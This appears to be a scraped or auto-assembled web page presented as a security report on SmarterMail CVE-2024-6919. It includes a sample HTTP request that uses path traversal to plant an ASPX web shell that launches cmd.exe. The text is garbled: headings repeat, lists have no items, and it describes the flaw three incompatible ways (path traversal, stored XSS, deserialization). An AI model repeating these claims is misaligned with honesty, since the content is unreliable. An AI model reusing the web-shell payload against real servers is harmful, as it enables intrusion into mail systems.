Security Report: SmarterTools SmarterMail CVE-2024-6919
With a web shell on the server, the attacker can:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HThe exploit chain combined two weaknesses: smartermail 6919 exploit
Imagine a typical SmarterMail server humming along, processing thousands of legitimate email logins. An attacker scans the internet for exposed SmarterMail login portals (usually on port 80, 443, or 9998 for the admin interface).
Using a simple tool like curl or a Python script, the attacker sends a request that looks something like this (simplified for clarity): Security Report: SmarterTools SmarterMail CVE-2024-6919
4
POST /interface/Download.aspx?file=../../../Windows/Temp/shell.aspx HTTP/1.1 Host: targetmailserver.com Content-Type: application/x-www-form-urlencoded
data=<% System.Diagnostics.Process.Start("cmd.exe"); %>
This request attempts to navigate up three directories (../../../) from the web root into the Windows temporary folder and write a file called shell.aspx. Because the server fails to validate the path, it complies. The attacker then visits https://targetmailserver.com/Temp/shell.aspx and now has a command prompt on the mail server itself.
Once inside, the attacker can:
The attacker sends a crafted calendar invitation or an email with a malicious HTML signature to the target administrator. Because the exploit is a Stored XSS (also known as Persistent XSS), the payload is saved directly on the SmarterMail server’s database.
A critical security vulnerability has been identified in SmarterTools SmarterMail. Designated as CVE-2024-6919, this flaw allows for unauthenticated remote code execution (RCE) due to an improper deserialization vulnerability. This vulnerability has a CVSS v3.1 base score of 9.8 (Critical). It affects SmarterMail versions prior to the patches released in May 2024. Read all incoming/outgoing emails